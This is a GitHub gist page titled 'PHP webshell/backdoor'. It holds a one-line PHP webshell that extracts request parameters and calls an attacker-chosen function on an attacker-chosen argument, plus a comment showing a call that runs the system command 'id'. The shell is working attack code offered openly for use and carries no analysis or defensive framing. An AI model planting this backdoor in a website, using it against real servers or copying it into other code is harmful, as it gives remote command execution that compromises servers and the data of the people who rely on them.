Skip to content

Instantly share code, notes, and snippets.

@takeshixx
Created April 5, 2014 14:07
Show Gist options
  • Save takeshixx/9992449 to your computer and use it in GitHub Desktop.
Save takeshixx/9992449 to your computer and use it in GitHub Desktop.
PHP webshell/backdoor
// Call: http://localhost/shell.php?f=system&c=id
<?@extract($_REQUEST);@die($f($c));?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment